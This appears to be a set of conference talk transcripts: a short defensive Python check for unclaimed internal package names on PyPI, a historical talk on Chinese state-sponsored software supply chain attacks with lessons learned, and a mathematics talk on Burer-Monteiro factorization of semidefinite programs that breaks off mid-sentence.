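name, ask PyPI's JSON endpoint whether the name is claimed. A 404 means the name is
free - an attacker could register it, and a misconfigured resolver might prefer the
public copy. 'internal-packages.txt' is a hypothetical file, one name per line."""
import urllib.error
import urllib.request

def exists_on_pypi(name):
    try:
        urllib.request.urlopen(f"https://pypi.org/pypi/{name}/json", timeout=10)
        return True
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False
        raise

if __name__ == "__main__":
    with open("internal-packages.txt") as fh:
        for name in (line.strip() for line in fh):
            if not name or name.startswith("#"):
                continue
            if exists_on_pypi(name):
                print(f"[?] '{name}' exists on public PyPI - check who owns it")
            else:
                print(f"[!] '{name}' is unclaimed on PyPI - register it or pin your index")
```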
XcodeSpy. So we know that attackers are targeting developers, and they're targeting the shared sites, the repositories, where code is uploaded for use by others. In March this year, a new malware variant was observed targeting iOS developers in a supply chain attack to install a backdoor on the developer's computer. XcodeSpy is a malicious project, and it affects Apple's free Xcode development environment. It's common behavior for developers to share their projects online with other users; it's just good sense, it's collaborative and it's efficient. Well, the threat actors behind this attack abused this norm, and they used a legitimate development environment created by Apple, no less, to fool victims into adding an online project to their applications that would compromise their system in a supply chain attack. Codecov is an online platform used for hosting code testing reports and statistics. It provides developers with tools to help them quantify just how much source code gets executed during testing, and they serve over 29,000 customers globally. Many of these are enterprise-level clients like GoDaddy, Atlassian, Royal Bank of Canada, Procter and Gamble. But the impact went beyond this to thousands of public development projects like Kubernetes, pytest and Ansible; victims included Twilio, Rapid7 and the e-commerce platform Mercari. On April 1st of this year, Codecov reported a supply chain attack that had occurred back in late January. What happened was this: attackers leveraged an error in the process that creates Codecov's Docker image. This allowed them to extract credentials which protected the modification of the Bash Uploader script, a tool used by customers to send code coverage reports to the platform. The script was modified to deliver details from customer environments to a server outside of Codecov. Attackers could exfiltrate credentials, tokens or keys which passed through Codecov's continuous integration environment, which we've talked about, and could then use these to access services, data stores or application code. In 2009, Operation Aurora served as a wake-up call when the Chinese state-sponsored group APT17 targeted Google, Adobe and some other tech firms, going after their source code management systems in order to alter that source code. We're going to talk a bit more about that later. In 2017, there was NotPetya. The elite Russian hacking team Sandworm, which is part of the GRU military intelligence service, compromised and took over the software updates of M.E.Doc, accounting software used throughout Ukraine, and used this to distribute the destructive malware known as NotPetya. This infected major companies like Maersk as unintended consequences, and the costs amounted to approximately $10 billion globally. In January of 2019, there was a sophisticated supply chain attack that targeted the ASUS Live Update utility, something that's pre-installed on pretty much all ASUS computers as an auto-update feature; we'll cover that a little later as well. This group also delivered something known as ShadowPad malware to infect enterprise networks using a product known as NetSarang, which specializes in server management and secure connectivity software. If this sounds familiar, it should; I think that just happened with SolarWinds. As promised, let's take a look at the Chinese APT groups who've been involved in software supply chain attacks, all state-sponsored adversaries.
Chinese cyber espionage groups have been and will continue to be the biggest threat to tech, conducting economic espionage and intellectual property theft. Technology companies are rich targets on their own, but these groups leverage them to infect supply chains and go after their customers. And they are the leaders of the pack in terms of the number of attacks and their capabilities. These are some of the most well-known attacks by Chinese state-sponsored threat actors, so I'll go through them briefly and highlight where attribution could be made, some key lessons about the targeting and intrusion, and the issue of trust. Something that really came across to me while I was doing the research was the overlap in terms of tactics and tools. My personal observation would be that these groups tend to work closely together: they were probably learning within one group, then moving on to another, and then they took what they had developed and learned and leveraged it as needed, because that's efficient and it's collaborative. And isn't that what we do when we're talking about open source development? Exactly. Why reinvent the wheel when you already have something perfectly useful, when somebody's already covered that ground? These groups are united, though, in how they serve their state and its mandate. Now, if you wanted to try mapping Chinese APTs to government and military, I found work already in progress by Anastasios Pingios, and I'll share the link on the next slide. It's very complex, but this is a great visual representation. Let me give you a moment to take a look at that so you can capture it. And if you're at all familiar with CrowdStrike, they like to group their adversaries in fun and colorful ways. All right, so let's start with 2009 and Operation Aurora. Like I said earlier, it really was a wake-up call. APT17 targeted Google, Adobe and other tech companies to go after their source code by tampering with their source code management systems. This led to Google implementing zero trust to track lateral movement and to build better infrastructure; those were their lessons learned. And what's interesting about this is that in the fallout of SolarWinds Orion, Google wasn't one of the companies mentioned. In 2017, an attack was discovered that targeted an administrative software package known as EvLog, made by Altair Technologies, a Canadian software company. This was a software supply chain intrusion which targeted enterprise organizations globally, including military organizations and defense contractors, which is something China cares deeply about developing and surpassing the West at. There were also banks and universities, and several major telecom providers. I get a little worried by targeted attacks against telcos for a few reasons, and that's not just because Akamai had a hiccup and went down; we all feel the pain when we lose our online access for any length of time, pretty much because we can't live without it. Now, in this attack there was a very impressive client list, and you should be thinking about SolarWinds, because that too was a very impressive client list. Several years later, we still don't know how many of those customers were, and could still be, compromised. Now, why EvLog? Because the users were mostly system and domain admins, and that offered excellent access to targeted networks after the initial compromise. That kind of access is really important.
I think many people may have already heard about this one: CCleaner. This has been linked to APT17, and more specifically to a subgroup known as Axiom, who have historically been engaged in supply chain attacks. The CCleaner attack showcases technical knowledge, preparation and patience. The timing was strategically advantageous because the original owner, Piriform, was in the process of selling to Avast. That creates a lot of distraction and confusion, so it's really easy to miss things, like things in the network that don't belong there. The attackers took their time to move laterally in the network during off hours to avoid detection. Within a month, they installed a modified version of the ShadowPad backdoor malware to escalate their privileges. Then they distributed a cryptographically signed version of a modified CCleaner product, and no one suspected. Signed, sealed, delivered. If we want to look at this a little more technically and walk through the actual steps of the attack: initial compromise came through unattended workstations belonging to a CCleaner developer. They were connected to the Piriform network, and the attackers utilized TeamViewer; they reused credentials found in previous data breaches in order to access that TeamViewer account. They delivered malware using VBScript, and they developed a malicious version of CCleaner. They used RDP to open the backdoor on a second unattended but connected computer. There are some good lessons in here if you're taking notes. There they dropped the binary and malicious payload of second-stage malware, which was delivered to 40 CCleaner users. They compiled a customized version of the ShadowPad backdoor to allow further malicious downloads and data theft in preparation for a third stage, and then they installed their third-stage payload. That malicious version had multi-stage malware in order to steal data and send it back to the command and control. As far as actions on objectives, it's very likely that stolen data has been put to great use in further espionage activities. If you wanted to map this against MITRE's ATT&CK framework, there's a lot that would be applicable. For example, under reconnaissance, you've got all the work they did on the supply chain compromise. Resource development: they compromised accounts, I believe they compromised infrastructure, they certainly developed capabilities and they established accounts. For initial access, thanks to those reused credentials, they had a valid account to get in with. For execution, they leveraged software deployment tools, and for persistence there was more account discovery and account manipulation to keep them in. For privilege escalation: exploitation for privilege escalation. For credential access, they had credentials, I believe, from password stores. Discovery: can I say they discovered everything there was to discover? Lateral movement, as we talked about: they used ShadowPad and remote services. Then exfiltration over the C2 channel, with the impact being data manipulation and exfiltration. ShadowHammer. This is the ASUS attack. In January 2019, a sophisticated supply chain attack was discovered targeting the ASUS Live Update utility, something that's pre-installed on most ASUS computers to make life easier for the end user: it automatically updates components like the BIOS, UEFI, drivers and applications.
In 2017, ASUS was the world's fifth largest PC vendor, which would make it an extremely attractive target for APT groups wanting to take advantage of its user base. In this case, that APT was the Chinese threat group APT17, or Barium, who were, as we've seen, behind the attack on CCleaner. The attackers altered an older version of the ASUS Live Update utility software and then distributed their modified version to ASUS computers around the world. The software looked legitimate: it was signed with legitimate ASUSTeK certificates, it was stored on official servers, and it was even the same file size. Signed, sealed, delivered. And once it was planted, that backdoor program gave attackers control of the target computers through remote servers that let them install additional malware. In 2020, there was an attack known as Able Desktop by the APT group LuckyMouse, and it involved tool reuse by other actors that were not only Chinese groups. I thought this was interesting, because the shared use of tools and collaboration within Chinese state-sponsored groups affects our ability to do accurate attribution. They compromised the Able Desktop chat software that's used by Mongolian government agencies, and then they hijacked updates in the software supply chain. This is a really good small picture of what could be a much larger, more devastating attack. And again, the attackers didn't need to steal or forge an update signature, because Able's updates were not signed. Another attack coming out of 2020 was SignSight, against the Vietnamese government certification authority, which was the target of a software supply chain intrusion affecting a wide range of public and private entities. The agency issues digital signature software that provides certificates of validation and software suites to handle digital document signatures. This software is widely used throughout Vietnam, and it's mandated in some cases. If you think of NotPetya and how that accounting software was mandatory, and there are other cases, this is what attackers, if we're looking through their lens, are leveraging against us. This is truly an abuse of trust. So the key point: the abuse of trust, leveraging a service oligopoly. We haven't got actual confirmation of who was behind it, but it's definitely believed to be a Chinese state-sponsored group, possibly a group known as TA428, who have a track record of targeting East Asian countries like Mongolia and Vietnam, and have possibly even gone into Russia for intel gathering. And that brings us to GoldenSpy. GoldenSpy malware was embedded in required tax payment software issued to corporations who wanted to conduct business operations in China. Chinese banks require businesses to install Intelligent Tax software to pay their local taxes, and it's produced by the Golden Tax Department of the Aisino Corporation. The malware installed a backdoor on systems which enabled a remote threat actor to execute Windows commands or to upload and execute any binary: that could be ransomware, remote access trojans, anything. And the malware provided system-level privileges, so the capability to execute any command or any software on the system where it's installed. And it was connected to a C2 that was distinct and separate from the tax software's network infrastructure. You've probably heard of these guys. This year, there was a very, very large breach, and the details around it are just coming to light.
SITA is a global IT provider for 90% of the world's airline industry. The pieces of this, when you put them together, link back to show that the Chinese state-sponsored threat actor APT41 was involved, and it potentially impacted over four and a half million passengers. SITA had announced the attack back in March, and soon after, Singapore and Malaysia Airlines disclosed that their customers' personal data had been exposed. After that, Air India reported a major attack against its systems. Group-IB took a closer look at this. They didn't believe what they saw at first, and then they realized the level of sophistication involved in what was an enormous attack that could only be attributed to a state-sponsored actor. With some digging, they were able to find artifacts through the malware and through overlaps in the code they were seeing to trace it back to APT41. APT41, also known as Wicked Panda, has ties to Barium; it's a group that's been active since 2007 and has a track record in supply chain attacks. And that's why attribution is so hard. All right, so let's talk about what we should and could learn from these attacks. We do have a new executive order, and that's a great step in the right direction, but the picture is far bigger than we realize. These are some recommendations. We need prompt communication when something happens; we need to be able to share information effectively; and we have to take action, because time is a luxury we don't have and something our adversaries have plenty of. Code signing is essential, even though, as we've seen, certificate abuse can be rampant. We need to find ways to ensure that tech is secured by default, and we need to establish international norms with clear penalties, because you can't have one without the other: if you're going to have policies, you need to have enforcement. Eric Chien of Symantec, who was also integral in helping investigate and decode Stuxnet, says that this is like finding a needle in a haystack, and you have to have the right security telemetry and visibility at the right control points in your organization. And here's the shift, so I'd like to end with this. I love podcasts, and one of my go-tos is Risky Business. They had an excellent segment about Operation Aurora with Marc Rogers from Okta, whom I've referenced a few times in here. If you can gain a position of trust, you can exploit it. Think service or non-person IDs: accounts that nobody really scrutinizes, with enough privilege to leverage and discover all the stuff that you need for an attack. Your chain is only as good as its weakest link, and there are more ways to abuse the chain of trust than people realize. Thank you so very much. I hope that you got some good stuff to work with out of this talk, and I really appreciate your time. My details are there; you can find me on Twitter. Thank you.
|
State-sponsored threat actors have engaged in software supply chain attacks for longer than most people realize, as governments seek out access to information and potential control. Of Russia, North Korea, Iran and China, China has been behind the most attacks, targeting the technology sector for economic espionage and intellectual property theft. In their current drive for innovation and cloud migration, organizations increasingly rely on software development and all its dependencies: third-party code, open-source libraries and shared repositories. Recent attacks have shown how easy it is to create confusion and send malicious code undetected through automated channels to waiting recipients. This talk will walk attendees through the stages of past attacks by Chinese APTs - notably APT10, APT17 and APT41 - to show how capabilities have evolved and what lessons could be applied to recent attacks, comparing tactics, techniques and procedures.
|
10.5446/54180 (DOI)
|
Thank you very much, and thanks to all the organizers for the invitation to this conference. What I'm going to present is joint work with Alden Waters from the Bernoulli Institute in Groningen; it's work we did a bit more than a year ago. It's about semidefinite programs. So let's consider a general semidefinite program. We have an unknown matrix X, and we want to find this unknown matrix X. We want to minimize the trace of CX for some fixed and known cost matrix C, under two types of constraints: X must satisfy m affine constraints, represented by the equality A(X) = b, where A is a linear operator with range included in R^m, and we also want X to be positive semidefinite. These semidefinite programs arise in particular as relaxations of combinatorial optimization problems. It has been known for quite a while now that there are many difficult optimization problems which you can lift, so approximate in some sense, by semidefinite programs. And oftentimes, although the semidefinite program is apparently only an approximation of the initial problem, it turns out that when you solve the semidefinite program, you get the exact solution of the difficult problem you started from. In particular, this lifting procedure appears when you want to solve max-cut problems. I mention it here because it's a family of semidefinite programs which we use as an example, as an illustration, at the end of the talk, so I prefer to introduce it now. Max-cut problems are originally problems from graph theory: you take a graph and you want to partition its vertices into two sets so that the number of edges that you cut when you do the partition is maximal. It turns out that you can approximate maximum cut problems by semidefinite programs of the form written here: minimize the trace of CX for some cost matrix C, under the constraint that the diagonal of X contains only ones, and also, of course, under the constraint that X is positive semidefinite. There has been a lot of research into algorithms which can solve semidefinite programs. There are several semidefinite program solvers which work in polynomial time: if you fix a precision, you can solve your semidefinite program in polynomial time depending on the precision. However, these solvers, although polynomial, tend to be slow, because the degree of the involved polynomial is large. For instance, if you use interior point solvers, then in full generality the per-iteration complexity is of the order of n^4, where n is the size of the unknown matrix, so you can imagine that you cannot work with very large values of n. Other algorithms than interior point solvers are of course possible, but they tend to suffer from more or less the same drawback. So if you still want to solve high-dimensional semidefinite programs, you have to exploit the fact that the problems you consider are not generic; they may have favorable properties that you can use. In particular, oftentimes the semidefinite programs that we are interested in have a solution with low rank. Actually, for geometric reasons, semidefinite programs always have a solution with rank at most this number, which is of the order of the square root of 2m; I remind you that m is the number of affine constraints.
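For reference, here is one way to write out the problems just described, in the notation used above (my rendering of what is on the slides, not a verbatim copy):

```latex
% General semidefinite program, with C the cost matrix and A linear with range in R^m:
\begin{equation*}
\min_{X \in \mathbb{S}^n} \ \operatorname{Tr}(CX)
\quad \text{s.t.} \quad \mathcal{A}(X) = b, \quad X \succeq 0 .
\end{equation*}
% Max-cut relaxation (here the m = n affine constraints fix the diagonal):
\begin{equation*}
\min_{X \in \mathbb{S}^n} \ \operatorname{Tr}(CX)
\quad \text{s.t.} \quad \operatorname{diag}(X) = \mathbf{1}, \quad X \succeq 0 .
\end{equation*}
% "Rank at most this number": there is always an optimal solution of rank r with
% r(r+1)/2 <= m, i.e. r is of the order of sqrt(2m).
```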
But in many situations, because of the way the semidefinite program has been constructed, in particular through lifting from a combinatorial optimization problem, there is often a solution with rank 1 or 2, so very small. To exploit the fact that there is a solution with low rank, there are two main families of methods. One of them is Frank-Wolfe methods, and the other one is the Burer-Monteiro heuristic. Both of them are interesting, but in this talk I will focus only on the Burer-Monteiro factorization. So let me explain how it works. Since we assume that there is a solution with low rank, we call r_opt the rank of a low-rank solution, and we observe that this solution can then be written as X = V V^T for a matrix V with n rows and p columns, for any integer p which is at least as large as the optimal rank. So it means that we can write the unknown matrix X in the form V V^T and, instead of directly trying to recover X, to optimize over X, we can try to optimize over V. This change of variables transforms our general semidefinite program at the top of the page into the second problem, where we now want to minimize the trace of C V V^T over all matrices V which satisfy the condition A(V V^T) = b. You note that the positive semidefiniteness constraint has disappeared, because matrices of the form V V^T are always positive semidefinite. I'd like to emphasize that the integer p is the factorization rank. It's a parameter of the factorization, something that must be chosen. It can be equal to r_opt, it can be larger, and whether you choose it equal, larger, or much larger will be important for the properties of the factorized problem that you get: one choice or another may make this problem easier or more difficult to solve. So it's an important choice. Now let's consider the factorized problem, and let's assume that the set of feasible matrices V, the set of matrices V satisfying the constraint A(V V^T) = b, is a manifold, and a nice manifold in the sense that we know it explicitly, we can manipulate it, and in particular we can run Riemannian optimization algorithms over this manifold. In this setting, we can precisely try to minimize the trace of C V V^T by Riemannian optimization over the manifold of feasible points. And then the number of variables that we have to optimize during this process is not n^2 anymore, as in the non-factorized formulation; it's n times p, the number of coefficients in V. Since p can be much smaller than n, we have many fewer coefficients to find, so we can hope for Riemannian algorithms to be much faster than SDP solvers. However, there is one issue: the factorized problem is not convex anymore, in contrast to the semidefinite program we had at the beginning. In particular, it might happen that Riemannian optimization algorithms get stuck at a local minimum or critical point instead of finding the global minimizer of the problem. It's an issue which can arise or not, and it depends on the choice of the factorization rank p. Therefore, I want to study the question: how must we choose p so that it's possible to solve the factorized problem without getting stuck at critical points? To give a partial answer to this question, I will first start with a literature review.
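Before the literature review, and to make the factorized approach concrete, here is a toy Python/NumPy sketch using the max-cut constraint diag(V V^T) = 1, so each row of V lies on a unit sphere. It uses plain fixed-step Riemannian gradient descent with row normalization as the retraction; this is only an illustration of the idea, not the more sophisticated Riemannian solvers the talk has in mind.

```python
import numpy as np

def burer_monteiro_maxcut(C, p, steps=2000, lr=1e-2, seed=0):
    """Toy Burer-Monteiro illustration for min tr(C V V^T) s.t. diag(V V^T) = 1.
    Fixed-step Riemannian gradient descent on the product of unit spheres
    (one sphere per row of V), with row normalization as the retraction."""
    n = C.shape[0]
    rng = np.random.default_rng(seed)
    V = rng.standard_normal((n, p))
    V /= np.linalg.norm(V, axis=1, keepdims=True)        # feasible starting point
    for _ in range(steps):
        G = 2 * C @ V                                     # Euclidean gradient of tr(C V V^T)
        G -= np.sum(G * V, axis=1, keepdims=True) * V     # project rows onto tangent spaces
        V -= lr * G                                       # gradient step
        V /= np.linalg.norm(V, axis=1, keepdims=True)     # retract back to the manifold
    return V

if __name__ == "__main__":
    # Small random symmetric cost matrix; here m = n, so p is chosen a bit above sqrt(2n).
    n = 30
    rng = np.random.default_rng(1)
    A = rng.standard_normal((n, n))
    C = (A + A.T) / 2
    p = int(np.ceil(np.sqrt(2 * n))) + 1
    V = burer_monteiro_maxcut(C, p)
    print("objective tr(C V V^T) =", np.trace(C @ (V @ V.T)))
```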
We'll see that empirical observations tend to suggest that as soon as p is slightly larger than the optimal rank, Riemannian optimization algorithms work; they do not get stuck at critical points. This phenomenon has been theoretically explained in very specific situations, but not in a general setting. In a general setting, so with no strong assumptions on the cost matrix C, the only guarantees that we have require the factorization rank p to be of the order of the square root of 2m, where m again is the number of constraints. And since the optimal rank is generally much smaller than the square root of 2m, there is a big gap between practice and general theory. We'll then try to determine whether this gap is a theoretical artifact or not, and we'll see that it's possible to very slightly improve the general guarantees in the literature. But this improvement is very minor; it doesn't change the leading order, square root of 2m. And with this improvement, the general guarantees are optimal, in the sense that if p is smaller than the square root of 2m, then the guarantees do not hold: without additional assumptions on the cost matrix C, it's not possible to guarantee that Riemannian optimization algorithms will work and not get stuck at critical points. This will be the main result of the talk. I will try to give a brief overview of the proof, and finally I will describe two open questions. So let's start with the literature. The Burer-Monteiro heuristic was introduced by Burer and Monteiro in 2003, and in the article where they introduced the heuristic, Burer and Monteiro performed a lot of numerical experiments on various semidefinite programs. They used only a factorization rank p of the order of the square root of 2m; they did not try smaller values of p. But at least for p equal to the square root of 2m, they observed that Riemannian optimization algorithms worked all the time. Other experiments can be found in an article by Journée et al. from 2010, which contains numerical experiments notably on max-cut relaxations. These experiments are conducted with a specific initialization scheme, but at least with this scheme, the authors observed that Riemannian optimization algorithms always worked when p was exactly equal to the optimal rank, so in principle very small. Yet another set of experiments was done by Nicolas Boumal with problems arising as relaxations of so-called orthogonal synchronization problems. In this set of problems, the optimal rank is exactly 3 by construction, and Nicolas Boumal observed that Riemannian optimization algorithms always worked as soon as the factorization rank p was larger than 5, so strictly larger than the optimal rank, but not much larger. Similar observations have been made for variants of SDP problems which I will not describe. This phenomenon has been theoretically, rigorously explained in a very specific setting by Bandeira, Boumal and Voroninski in 2016. The authors considered semidefinite programs obtained by lifting optimization problems called Z2 synchronization or community detection. They made very strong assumptions on the statistical properties of the underlying Z2 synchronization and community detection problems, and thanks to these strong assumptions, the resulting semidefinite programs had a lot of structure. This allowed them to show that, with high probability, the semidefinite programs they considered had a rank-1 solution.
And the Burer-Monteiro factorization with factorization rank p equal to 2 was such that Riemannian optimization algorithms could not fail. So in this specific case, the success of Riemannian optimization algorithms was explained, but it's quite a complicated proof and it's only for a very specific setting. For variants of semidefinite programs, other very specific settings could be studied and similar results could be obtained, but each time the principle is the same: you need very strong assumptions on the problem you consider, and then with these strong assumptions you can show that if the factorization rank p is larger than the optimal rank, then everything works. If you don't want to make very strong assumptions on the semidefinite program that you consider, then the literature does not contain many results about this; there is essentially one result, again due to Boumal, Voroninski and Bandeira, so I will describe this result. Let me first recall the problem that we are considering. It's a factorized semidefinite program: we want to minimize the trace of C V V^T over the matrices V for which A(V V^T) is equal to b. We denote by M_p the set of feasible matrices V, and we assume that this set is a manifold. Actually, Boumal, Voroninski and Bandeira need a slightly stronger assumption, but in practice it's essentially equivalent to the fact that this set is a manifold. So in this setting, the problem that we consider can be equivalently rewritten as: minimize the trace of C V V^T over all matrices V in M_p. Boumal, Voroninski and Bandeira observe that suitable Riemannian optimization algorithms, when properly implemented, necessarily converge to a second-order critical point, meaning that they converge to a matrix V_0 in M_p which satisfies the first-order condition, so the Riemannian gradient of the cost function at V_0 is zero, and which also satisfies the second-order condition, meaning that the Riemannian Hessian of the cost function at V_0 is positive semidefinite. And the authors showed that, for almost all cost matrices C, provided that the factorization rank p is larger than the square root of (2m + 1/4) minus 1/2, all second-order critical points are global minimizers. As a consequence, since Riemannian optimization algorithms find at least one second-order critical point, they necessarily find a global minimizer. So this proves that Riemannian optimization algorithms necessarily succeed in finding the global solution, provided that p is larger than this number, which is essentially the square root of 2m. You can observe that the lower bound on p in the theorem does not depend on the optimal rank: it's of the order of the square root of 2m, whether the optimal rank is large or very small. So, to summarize what I've said so far: from numerical experiments, it seems that Riemannian optimization algorithms work well as soon as the factorization rank p is of the order of the optimal rank, but the only general theoretical guarantees that we have to justify this fact require the factorization rank p to be at least as large as the square root of 2m. [Audience question:] Can you explain what you mean by "almost all C" in the previous theorem? [Answer:] Yes, sorry, I haven't said it: almost all C means all matrices C except a set with zero Lebesgue measure, so it's in the Lebesgue measure sense.
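For clarity, the threshold just quoted can be rewritten by simple algebra (nothing beyond what was just stated):

```latex
\begin{equation*}
p \;>\; \sqrt{2m + \tfrac14} - \tfrac12
\qquad \Longleftrightarrow \qquad
\frac{p(p+1)}{2} \;>\; m ,
\end{equation*}
% i.e., roughly speaking, the factorization rank must be large enough that a
% p x p symmetric matrix has more degrees of freedom (p(p+1)/2) than there are
% affine constraints m.
```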
And as I have already said several times, the optimal rank is generally much smaller than the square root of 2m, hence there is a gap between these two regimes. So now we are going to try to answer the question: is it possible to obtain general guarantees for values of p much smaller than the square root of 2m? We are going to see that we can slightly improve the lower bound on p in the theorem by Boumal, Voroninski and Bandeira, but it is really a slight improvement: it does not change the fact that the bound is of the order of the square root of 2m, up to constants. And with this improvement, the result is essentially optimal, in the sense that even if you assume that the optimal rank is 1, the smallest you can hope for, then if p is smaller than the square root of 2m there are bad cost matrices C for which Riemannian optimization algorithms may fail.

First, the slight improvement over the result by Boumal, Voroninski and Bandeira: we can prove the same theorem as theirs, replacing their lower bound by the square root of (2m + 9/4) minus 3/2. You can check that this lower bound is strictly better than theirs, but generally the two lower bounds differ only by one unit, so unless m is very small, it is not very interesting. With this improvement, the theorem is essentially optimal. Let me describe why. We define r0 to be the minimal rank of a matrix X in the feasible set of the original semidefinite program; this is the line at the top. Then, under suitable technical hypotheses, which I will not describe but which are generically satisfied, as soon as the factorization rank p is smaller than this number, which is of the order of the square root of 2m, there exists a set of bad cost matrices C for which the corresponding semidefinite program has an optimal solution of rank r0, and nevertheless the Burer-Monteiro factorization has a second-order critical point which is not a global minimizer. This means that if you run a Riemannian optimization algorithm and you are unlucky enough to initialize it close to that second-order critical point, the algorithm will fail.

In this theorem there is a number r0. In most applications of interest, r0 is really small; in many applications r0 is actually 1. This yields the following picture. When the factorization rank p is larger than the square root of (2m + 9/4) minus 3/2, Riemannian optimization algorithms work for almost all cost matrices C. When the factorization rank p is smaller than this number, you cannot rule out the possibility that Riemannian optimization algorithms fail. In between, we do not know what happens, but the in-between region has size only r0 minus 1, so it is typically much smaller than the square root of 2m, and if r0 equals 1, it is even empty.

We can apply this result to max-cut problems, as described in the introduction. Recall that max-cut relaxations are semidefinite programs of the form at the top: minimize the trace of C X under the constraints that the diagonal of X is 1 and X is positive semidefinite. When we factorize it through the Burer-Monteiro heuristic, we get the problem: minimize the trace of C V V transpose under the constraint that the diagonal of V V transpose is 1.
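As a LaTeX summary of the max-cut example just described (with n the size of the matrix, so there are m = n diagonal constraints):

% Max-cut relaxation and its Burer--Monteiro factorization, as described above.
\[
\min_{X \succeq 0} \operatorname{tr}(CX) \ \text{ s.t. } \operatorname{diag}(X) = \mathbf{1}
\qquad \text{becomes} \qquad
\min_{V \in \mathbb{R}^{n \times p}} \operatorname{tr}\!\left(C V V^{\top}\right) \ \text{ s.t. } \operatorname{diag}\!\left(V V^{\top}\right) = \mathbf{1},
\]
% i.e. every row of V lies on the unit sphere of R^p. Here m = n, and r_0 = 1 since
% rank-one feasible points exist (for example X = vv^T with v a vector of signs in {-1,+1}^n).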
And in this case, we can check that r0 equals 1 and that the technical hypotheses I mentioned are satisfied. Therefore, for problems of this type, if the factorization rank p is larger than the number at the top, Riemannian optimization algorithms always work for almost all cost matrices C. But if p is smaller than this quantity, then there are cost matrices C, in a set of non-zero Lebesgue measure, for which, even though there is a rank-one solution (so of rank much smaller than the square root of 2m), there are bad second-order critical points and Riemannian algorithms can fail.

I am now turning to the proof. Do you have questions before I begin? Yes? Sorry, yes. So in my theorem, I consider a family of semidefinite problems: the operator A which defines the affine constraints is fixed, but I consider all possible cost matrices C. So there is not one global solution; r0 is the minimal possible rank of the solution when I look over all possible cost matrices C. If you consider the set of matrices C for which the rank of the optimal solution is equal to r0, is it a set of zero Lebesgue measure? No, it is not. Actually, this is also a consequence of the theorem, although it is not formulated that way: if you forget the second property, you see that there is a non-zero Lebesgue measure set on which the global minimizer necessarily has rank r0.

So let's start the proof. We assume that the factorization rank p is smaller than this threshold of the order of the square root of 2m, and we want to show that Riemannian optimization algorithms can fail. That is, we want to construct a set of cost matrices C, with non-zero Lebesgue measure, on which the global minimizer has rank r0, and such that for any cost matrix C in this set, the factorized problem has a second-order critical point which is not a global solution. This is done in two steps. First, we construct one matrix C which satisfies these two properties. Second, we show that all cost matrices close enough to this bad C satisfy the same properties; hence there is a small ball of cost matrices satisfying these properties, hence a non-zero Lebesgue measure set. The second step is very classical and uses only standard arguments, so I will focus on the first step: how to construct one bad cost matrix C.

Let's fix X0, with rank r0, in the feasible set of the semidefinite problem, and let's fix V in the feasible set of the factorized problem. We are going to construct a cost matrix C for which the semidefinite problem has X0 as a global minimizer, and the factorized problem has V as a second-order critical point which is not the global solution. If we construct such a C, then we have constructed a C satisfying the two properties that we want: the global minimizer has rank r0, and there is a second-order critical point of the factorized problem which is not optimal. It turns out that constructing such a matrix C is possible for almost any choice of X0 and V. So let's fix arbitrary X0 and V and construct C: we want C to have X0 as the unique global minimizer of the semidefinite problem, and we want the factorized problem associated with C to have V as a second-order critical point.
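A compact LaTeX statement of the construction target just described (the sufficient condition in terms of a multiplier vector is developed next):

% Goal of the construction: given a feasible X_0 of rank r_0 and a feasible V,
% find a cost matrix C such that
\[
\text{(i)} \quad X_0 \ \text{is the unique global minimizer of} \ \min_{\mathcal{A}(X)=b,\ X \succeq 0} \operatorname{tr}(CX),
\]
\[
\text{(ii)} \quad V \ \text{is a second-order critical point of} \ \min_{V' \in \mathcal{M}_p} \operatorname{tr}\!\left(C V' V'^{\top}\right)
\ \text{which is not a global minimizer.}
\]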
Since we know the analytic expressions of the gradient and the Hessian of all the functions involved, we can rewrite these two conditions in explicit analytic form, and we can simplify the expressions that we get. We can then show (trust me on this, it is not obvious) that the construction of C is possible as soon as there exists a vector mu in R^m for which V transpose A*(mu) V is positive semidefinite and X0 transpose A*(mu) V is zero, where A* is the adjoint operator of A. So we wonder whether such a mu exists. To determine whether it exists or not, we consider the following map from R^m to the product of the symmetric matrices of size p by p and the matrices of size r0 by p: the map which to mu associates the pair (V transpose A*(mu) V, X0 transpose A*(mu) V). We compare the dimension of R^m with the dimension of the image space, the symmetric p by p matrices times the r0 by p matrices, and we observe that if the dimension of R^m is larger than the dimension of the image space, that is, larger than p(p+1)/2 plus p times r0, then the map I have just defined should generically be surjective: a more or less arbitrary linear map from a vector space to a vector space of smaller dimension is generically surjective. And if the map is surjective, it is possible to find mu such that the two conditions above are satisfied: you can choose mu whose image under the map is the pair (identity, 0). The condition that m is larger than p(p+1)/2 plus p times r0 is exactly equivalent to the condition we imposed on p at the beginning of the proof. Hence the map I have defined is generically surjective and mu generically exists. And thanks to the technical assumptions which I have hidden under the carpet, it is actually not just generically surjective, it is surjective.

Let me summarize. When p is larger than the square root of 2m, Boumal, Voroninski and Bandeira have shown that for almost any cost matrix, the factorized problem has no second-order critical points which are not minimizers, and hence the factorized problem can be solved efficiently. Numerical experiments suggested that maybe we could conjecture that this was also true for p of the order of the optimal rank, so much smaller than the square root of 2m. What we have proved with Alden Waters is that when p is smaller than the square root of 2m, this is actually not true: if we want to guarantee that Riemannian optimization algorithms work, we need additional assumptions on the problem; it is not true for arbitrary C.

There are two open questions which I would like to briefly describe. The two main open questions I am interested in are, first, to better understand the regime where p is smaller than the square root of 2m, and second, to see how the Burer-Monteiro technique applies to phase retrieval problems, a specific family of semidefinite problems. For the first question: the theoretical guarantees which now exist in the literature about solving the Burer-Monteiro factorization are of two types. Either you have articles which assume very strong assumptions on the cost matrix, hence on the problem, and they get very strong conclusions: you can show that there are no bad critical points for p of the order of the optimal rank, or the optimal rank plus 1. So when the cost matrix C is very nice in some sense, you can say that the factorization works for p of the order of the optimal rank.
And what we have shown with Alden Waters could be summarized by the sentence: if we allow C to be arbitrarily adversarial, then it is necessary to take p of the order of the square root of 2m, otherwise we may get stuck at critical points. But in most applications, I think the cost matrices C are neither very nice nor very bad, so we would like to understand the regime in between. It would be interesting to get results of the form: under reasonable but not very strong assumptions on C, the Burer-Monteiro factorization has no bad second-order critical points for p of the order of the optimal rank, not exactly the optimal rank, but something like twice or three times the optimal rank. This is something I think would be useful. The second question I am interested in is to see how the theoretical insights I have tried to describe can apply, and potentially be useful, in a specific application. I am personally interested in phase retrieval problems, which arise notably in optics, where you try to reconstruct a vector x with complex coordinates from the moduli (the standard complex modulus) of linear measurements. It is known that these problems can be approximated by semidefinite programs, and when we solve the corresponding semidefinite programs we get phase retrieval algorithms which are usually very precise, but which do not really work in high dimension, because solving semidefinite programs is usually costly. So I would be interested in understanding to what extent the Burer-Monteiro heuristic can speed up the solving of the semidefinite problems coming from phase retrieval. It 